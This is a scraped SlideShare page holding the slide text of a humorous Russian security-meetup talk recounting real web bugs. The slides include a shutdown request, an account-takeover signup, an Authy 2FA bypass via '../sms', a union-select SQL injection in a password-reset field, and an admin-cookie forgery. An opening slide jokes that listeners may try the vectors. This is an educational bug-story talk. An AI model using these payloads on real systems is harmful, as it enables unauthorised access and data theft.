бесплатный курс по ускоренному созданию сайта для интернет бесплатный курс по ускоренному созданию сайта для интернет
бесплатный курс по ускоренному созданию сайта для интернет
 
QA Fest 2016. Алексей Виноградов. Цель тестирования. А на самом деле?
QA Fest 2016. Алексей Виноградов. Цель тестирования. А на самом деле?QA Fest 2016. Алексей Виноградов. Цель тестирования. А на самом деле?
QA Fest 2016. Алексей Виноградов. Цель тестирования. А на самом деле?
 
Харланова Наталья портфолио - интервью Светланы Терехиной и Алексея Еланцева...
Харланова Наталья портфолио - интервью Светланы Терехиной и Алексея Еланцева...Харланова Наталья портфолио - интервью Светланы Терехиной и Алексея Еланцева...
Харланова Наталья портфолио - интервью Светланы Терехиной и Алексея Еланцева...
 
как работать с Youtube
как работать с Youtube как работать с Youtube
как работать с Youtube
 
Продукт или проект - Александр Борисов Dev2Dev v1.5 23.11.2014
Продукт или проект - Александр Борисов Dev2Dev v1.5 23.11.2014Продукт или проект - Александр Борисов Dev2Dev v1.5 23.11.2014
Продукт или проект - Александр Борисов Dev2Dev v1.5 23.11.2014
 
Ulect brief rus1
Ulect brief rus1Ulect brief rus1
Ulect brief rus1
 
Сумма технологий: +5 к скорости разработки
Сумма технологий: +5 к скорости разработкиСумма технологий: +5 к скорости разработки
Сумма технологий: +5 к скорости разработки
 
ТЗ на сайт
ТЗ на сайтТЗ на сайт
ТЗ на сайт
 
Trening modul1-webinar5
Trening modul1-webinar5Trening modul1-webinar5
Trening modul1-webinar5
 
Подготовка ТЗ на электронные курсы. Колоденский А. 26.11.09
Подготовка ТЗ на электронные курсы. Колоденский А. 26.11.09Подготовка ТЗ на электронные курсы. Колоденский А. 26.11.09
Подготовка ТЗ на электронные курсы. Колоденский А. 26.11.09
 
Инструменты образовательного бизнеса
Инструменты образовательного бизнесаИнструменты образовательного бизнеса
Инструменты образовательного бизнеса
 
eLearningSoft - JoomlaLMs
eLearningSoft - JoomlaLMseLearningSoft - JoomlaLMs
eLearningSoft - JoomlaLMs
 
Компетенции внутренних разработчиков курсов_Тихомирова Е.В. 14.10.10
Компетенции внутренних разработчиков курсов_Тихомирова Е.В. 14.10.10Компетенции внутренних разработчиков курсов_Тихомирова Е.В. 14.10.10
Компетенции внутренних разработчиков курсов_Тихомирова Е.В. 14.10.10
 
Iro ufa
Iro ufaIro ufa
Iro ufa
 
Slideshare presentation at askcap
Slideshare presentation at askcapSlideshare presentation at askcap
Slideshare presentation at askcap
 
SecDevOps. Разработка, DevOps и безопасность.
SecDevOps. Разработка, DevOps и безопасность.SecDevOps. Разработка, DevOps и безопасность.
SecDevOps. Разработка, DevOps и безопасность.
 
Корольков
КорольковКорольков
Корольков
 

Mehr von Дмитрий Бумов

Defcon Russia 2017 - Bo0oM vs Шурыгина
Defcon Russia 2017 - Bo0oM vs ШурыгинаDefcon Russia 2017 - Bo0oM vs Шурыгина
Defcon Russia 2017 - Bo0oM vs ШурыгинаДмитрий Бумов
 
Отравление кэша веб-приложений
Отравление кэша веб-приложенийОтравление кэша веб-приложений
Отравление кэша веб-приложенийДмитрий Бумов
 
XSS. Обходы фильтров и защит.
XSS. Обходы фильтров и защит.XSS. Обходы фильтров и защит.
XSS. Обходы фильтров и защит.Дмитрий Бумов
 
Skolkovo школа | Капельку о MITM
Skolkovo школа | Капельку о MITMSkolkovo школа | Капельку о MITM
Skolkovo школа | Капельку о MITMДмитрий Бумов
 
PHDAYS 2017 | Зато удобно! Утечки из-за ботов в telegram
PHDAYS 2017 | Зато удобно! Утечки из-за ботов в telegramPHDAYS 2017 | Зато удобно! Утечки из-за ботов в telegram
PHDAYS 2017 | Зато удобно! Утечки из-за ботов в telegramДмитрий Бумов
 
пресс конференция 15.06.2016. безопасность платежных систем и банков
пресс конференция 15.06.2016. безопасность платежных систем и банковпресс конференция 15.06.2016. безопасность платежных систем и банков
пресс конференция 15.06.2016. безопасность платежных систем и банковДмитрий Бумов
 

Mehr von Дмитрий Бумов (20)

2000day in Safari
2000day in Safari2000day in Safari
2000day in Safari
 
Partyhack 3.0 - Telegram bugbounty writeup
Partyhack 3.0 - Telegram bugbounty writeupPartyhack 3.0 - Telegram bugbounty writeup
Partyhack 3.0 - Telegram bugbounty writeup
 
ZeroNights 2018 | I <"3 XSS
ZeroNights 2018 | I <"3 XSSZeroNights 2018 | I <"3 XSS
ZeroNights 2018 | I <"3 XSS
 
ZeroNights 2018 | Race Condition Tool
ZeroNights 2018 | Race Condition ToolZeroNights 2018 | Race Condition Tool
ZeroNights 2018 | Race Condition Tool
 
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypass
 
Defcon Russia 2017 - Bo0oM vs Шурыгина
Defcon Russia 2017 - Bo0oM vs ШурыгинаDefcon Russia 2017 - Bo0oM vs Шурыгина
Defcon Russia 2017 - Bo0oM vs Шурыгина
 
DC7499 - Param-pam-pam
DC7499 - Param-pam-pamDC7499 - Param-pam-pam
DC7499 - Param-pam-pam
 
KazHackStan - "><script>alert()</script>
KazHackStan - "><script>alert()</script>KazHackStan - "><script>alert()</script>
KazHackStan - "><script>alert()</script>
 
VolgaCTF 2018 - Neatly bypassing CSP
VolgaCTF 2018 - Neatly bypassing CSPVolgaCTF 2018 - Neatly bypassing CSP
VolgaCTF 2018 - Neatly bypassing CSP
 
Отравление кэша веб-приложений
Отравление кэша веб-приложенийОтравление кэша веб-приложений
Отравление кэша веб-приложений
 
XSS. Обходы фильтров и защит.
XSS. Обходы фильтров и защит.XSS. Обходы фильтров и защит.
XSS. Обходы фильтров и защит.
 
RIW 2017 | Все плохо
RIW 2017 | Все плохоRIW 2017 | Все плохо
RIW 2017 | Все плохо
 
Skolkovo школа | Капельку о MITM
Skolkovo школа | Капельку о MITMSkolkovo школа | Капельку о MITM
Skolkovo школа | Капельку о MITM
 
PHDAYS 2017 | Зато удобно! Утечки из-за ботов в telegram
PHDAYS 2017 | Зато удобно! Утечки из-за ботов в telegramPHDAYS 2017 | Зато удобно! Утечки из-за ботов в telegram
PHDAYS 2017 | Зато удобно! Утечки из-за ботов в telegram
 
Armsec 2017 | 2 bugs 1 safari
Armsec 2017 | 2 bugs 1 safariArmsec 2017 | 2 bugs 1 safari
Armsec 2017 | 2 bugs 1 safari
 
KazHackStan 2017 | Tracking
KazHackStan 2017 | TrackingKazHackStan 2017 | Tracking
KazHackStan 2017 | Tracking
 
Разведка боем
Разведка боемРазведка боем
Разведка боем
 
VolgaCTF | Bo0oM - DNS and attacks
VolgaCTF | Bo0oM - DNS and attacksVolgaCTF | Bo0oM - DNS and attacks
VolgaCTF | Bo0oM - DNS and attacks
 
пресс конференция 15.06.2016. безопасность платежных систем и банков
пресс конференция 15.06.2016. безопасность платежных систем и банковпресс конференция 15.06.2016. безопасность платежных систем и банков
пресс конференция 15.06.2016. безопасность платежных систем и банков
 
Fuzz.txt
Fuzz.txtFuzz.txt
Fuzz.txt
 

Bo0oM - Ты такой смешной XD #securitymeetup

  • 1. learnppt.com LOGO Ты такой смешной!!!1!))00) Весёлые (и не очень) баги и взломы 9 апреля 2015 #securitymeetup
  • 2. ПРЕДУПРЕЖДЕНИЕ! Последующие слайды содержат сцены сексуального насилия над web-приложениями и програмным обеспечением различной тематики и направленности. Копирование и воспроизведение векторов атак карается 272 статьей Уголовного кодекса Российской Федерации, хотя такие экземпляры ещё и найти надо, так что можете попробовать, но если что, я вас предупреждал! Ну вы поняли...
  • 3. 3 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO Время интересных ИСТОРИЙ #securitymeetup
  • 4. 4 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO @isox_xx #securitymeetup
  • 5. 5 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO GET /shutdown/ HTTP/1.1 Host: up-fotki.yandex.ru User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:28.0) Gecko/20100101 Firefox/28.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://fotki.yandex.ru/upload?force=js Cервак выключается... https://up-fotki.yandex.ru/shutdown/ @isox_xx #securitymeetup
  • 6. 6 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO @isox_xx #securitymeetup
  • 7. 7 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO @isox_xx #securitymeetup
  • 8. 8 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO @isox_xx #securitymeetup
  • 9. 9 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO @webpentest POST /signup/claim/id*/ HTTP/1.1 ... CSRF=bLJtKc0uLGGWoBkKhNMJCXGt0mhlhHiw&email=email@example.com&p assword=test&login=MyLogin POST /signup/claim/WMkiheTT-8kRslImVLWMVw/ HTTP/1.1 ... CSRF=bLJtKc0uLGGWoBkKhNMJCXGt0mhlhHiw&email=email@example.com&p assword=test&login=Administrator Регистрация курильщика: Регистрация здорового человека: *Где id - уникальный идентификатор, который берётся... На странице существующего пользователя #securitymeetup
  • 10. 10 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO @webpentest Уже существует пользователь? Не беда! В итоге перекидывает в админку сервиса с "свежереганным" логином. #securitymeetup
  • 11. 11 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO @4rt3m #securitymeetup
  • 12. 12 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO @4rt3m #securitymeetup
  • 13. 13 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO #securitymeetup
  • 14. 14 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO @fb1h2s @msecnet #securitymeetup
  • 15. 15 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO @homakov #securitymeetup
  • 16. 16 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO @homakov 1. Вводим ../sms в поле токена 2. Клиент кодирует это как ..%2fsms и делает запрос на api.authy.com/protected/json/verify/..%2fsms/authy_id 3. path_traversal декодирует полученный URL на раннем этапе в api.authy.com/protected/json/verify/../sms/authy_id, делит все по / и удаляет директорию /verify 4. Теперь само приложение получает модифицированный путь api.authy.com/protected/json/sms/authy_id который посылает СМС жертве и возвращает 200 статус и ответом {«success»:true,«message»:«SMS token was sent», «cellphone»:"+1-XXX-XXX-XX85"} 5. Наш клиент который хотел проверить наш токен видит 200 статус и делает вывод что токен правильный. Даже если используется кастомная реализация API, клиент скорее всего ищет success=true что в нашем ответе тоже присутствует. Попросту говоря введя ../sms в поле токена можно было обойти двух факторную аутенфикацию на всех сайтах использующих Authy. #securitymeetup
  • 17. 17 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO #securitymeetup
  • 18. 18 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO #securitymeetup Один из примеров фикса...
  • 19. 19 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO @fgkm_ Когда имя пользователя в url #securitymeetup
  • 20. 20 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO @Black2Fan RCE В ФОРМИРОВАНИИ CSS ФАЙЛА!!!!!11!!!!!адин!! #securitymeetup
  • 21. 21 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO Root, пароль для слабаков! #securitymeetup
  • 22. 22 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO @d90andrew Восстановление пароля. Поле для email'а: my@gmail.com' and 'a'='a# - письмо приходит my@gmail.com' and 'a'='b# - не отправляется my@gmail.com' union select 1,2,3,4,5,6# #securitymeetup
  • 23. 23 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO @d90andrew my@gmail.com' union select 1,2,3,concat_ws(0x3a,version(),database()),5,6# #securitymeetup
  • 24. 24 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO @d90andrew Пара часов и база пользователей в кармане! Точнее в почте... #securitymeetup
  • 25. 25 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO #securitymeetup
  • 26. 26 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO ЧОЭТА? #securitymeetup
  • 27. 27 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO @asintsov Привет, сервак, как жизнь? Как дети? Форкаешься еще? Если ты ADMIN, то хэш твоего пароля XXXXXXX! Ты уверен, что у твоего пароля такой хэш? Ну ты скажешь! Конечно! У меня такой же хэш и получился! Админ я или кто, по-твоему! Ну раз Админ, то проходи! Ну привет, клиентик. Ты сам-то чьих будешь? Ну как же это? Админ я, Админ! Соединение установлено. Текущий пользователь: ADMIN Самая крутая СУБД в мире - OpenEdge #securitymeetup
  • 28. 28 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO ЧТОЧТО ЗАЗА херняхерня туттут ПРОИСХОДИТ??ПРОИСХОДИТ?? #securitymeetup
  • 29. 29 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO Были подобраны файлы и папки: • /image/ • /css/ • /js/ • /index.php • /login.php • /logout.php #securitymeetup
  • 30. 30 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO GET /logout.php HTTP/1.1 Host: *******.ru HTTP/1.1 200 Ok Server: nginx Date: Dec, 29 Apr 1970 13:14:41 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close Cache-Control: no-cache,no-store,max-age=0,must-revalidate Set-Cookie: 7ed93bc3576665339e899f356890fa5e=false; Path=/ Запрос: Ответ: #securitymeetup
  • 31. 31 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO GET /index.php HTTP/1.1 Host: *******.ru Cookie: 7ed93bc3576665339e899f356890fa5e=true Запрос: Добро пожаловать в панель администратора! ииииииииии... #securitymeetup
  • 32. 32 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO А бывает наоборот... #securitymeetup
  • 33. 33 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO #securitymeetup Bo0oM @i_bo0om Пишу лучше чем говорю (инфа сотка)
  • 34. 34 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO #securitymeetup СДАЛСДАЛ ИГЭИГЭ ??http://goo.gl/TxxCi3